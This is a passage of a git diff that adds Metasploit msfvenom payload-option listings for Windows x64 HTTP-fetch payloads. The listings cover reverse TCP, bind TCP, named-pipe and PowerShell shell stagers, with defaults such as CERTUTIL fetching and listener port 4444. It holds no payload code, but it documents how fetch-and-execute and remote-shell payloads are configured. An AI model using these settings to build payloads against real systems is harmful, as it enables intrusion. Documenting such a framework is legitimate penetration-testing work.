selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_uuid.txt new file mode 100644 index 0000000..014e4b1 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_uuid.txt @@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/peinject/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME YPbMuQaXwL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..a1411d4 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-pingback_reverse_tcp.txt @@ -0,0 +1,71 @@ + + Name: HTTP Fetch, Windows x64 Pingback, Reverse TCP Inline + Module: payload/cmd/windows/http/x64/pingback_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME digkVfDgI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and report UUID (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-powershell_bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-powershell_bind_tcp.txt new file mode 100644 index 0000000..f7e4f1e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-powershell_bind_tcp.txt @@ -0,0 +1,64 @@ + + Name: HTTP Fetch + Module: payload/cmd/windows/http/x64/powershell_bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + Ben Turner + Dave Hardy + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME MtJgQqcelFDr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LOAD_MODULES no A list of powershell modules separated by a comma to download over the web +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp.txt new file mode 100644 index 0000000..946fa4b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp.txt @@ -0,0 +1,71 @@ + + Name: HTTP Fetch + Module: payload/cmd/windows/http/x64/powershell_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + Ben Turner + Dave Hardy + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME IZnoyzaDb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LOAD_MODULES no A list of powershell modules separated by a comma to download over the web +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp_ssl.txt b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp_ssl.txt new file mode 100644 index 0000000..90cee0c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-powershell_reverse_tcp_ssl.txt @@ -0,0 +1,73 @@ + + Name: HTTP Fetch + Module: payload/cmd/windows/http/x64/powershell_reverse_tcp_ssl + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + Ben Turner + Dave Hardy + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME RhhhFNCfU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LOAD_MODULES no A list of powershell modules separated by a comma to download over the web +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp.txt new file mode 100644 index 0000000..62e1877 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp.txt @@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/shell/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME nmfalUUhDk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..079b595 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME jOSyoHRbgA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_named_pipe.txt new file mode 100644 index 0000000..84d8800 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_named_pipe.txt @@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/shell/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ksbSMKfLkdnf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..b93dfed --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp.txt @@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/shell/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME MFGFwkbAEqO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID 